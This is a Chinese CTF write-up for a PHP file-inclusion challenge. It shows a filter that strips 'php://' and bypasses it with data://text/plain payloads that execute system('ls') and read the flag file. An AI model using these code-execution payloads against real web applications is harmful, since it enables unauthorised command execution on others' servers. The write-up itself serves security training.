一、题目链接

https://adworld.xctf.org.cn/challenges/list?rwNmOdr=1691398818171

二、解法步骤

  本题依旧是文件包含，但是这题不同，

while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}

  这条语句过滤掉了以往的php://filter/read=convert.base64-encode/resource=flag.php方式。绕过方式就是换一个伪协议，比如将php://换成data://text/plain,。

  payload:?page=data://text/plain,<? system('ls;');?>

  然后尝试cat fl4gisisish3r3.php:

  ?page=data://text/plain,<?php system('cat fl4gisisish3r3.php');?>,如果页面没显示出来，就用bp抓包：

  得到flag。

三、总结

  本题是对文件包含的其他伪协议的运用，例如data://text/plain,<?php 代码?>，积累下来吧。

本栏目推荐文章
• 函数计算域名调试web应用
• web目录探测：Dirsearch
• 读元宇宙改变一切笔记06_虚拟世界引擎
• web项目启动时dubbo报错： No provider available for the service com.davidhu.shopguide.api.service.UserEventService from the url zookeeper ://localhost:2181/org.apache.du
• 如何基于 Gin 封装出属于自己 Web 框架？
• 读元宇宙改变一切笔记06_虚拟世界引擎
• 数论专题
• 【专题】2023中国经济高质量发展中的商业地产趋势与机遇专题报告PDF合集分享（附原数据表）
• 【专题】2022云上新型电力系统报告PDF合集分享（附原数据表）
• 【专题】新零售下品牌消费者为中心的数字化转型报告PDF合集分享（附原数据表）

Web_php_include Web include 专题 世界web_php_include web include专题 web_php_include web_php_include include web php web_xctf_writeup web_php_include web writeup file_include include专题 世界 file_include include世界file 新生include专题ctfer 专题glance世界ctfer 技术 专题 用球 世界 web_buuctf_writeup新生include writeup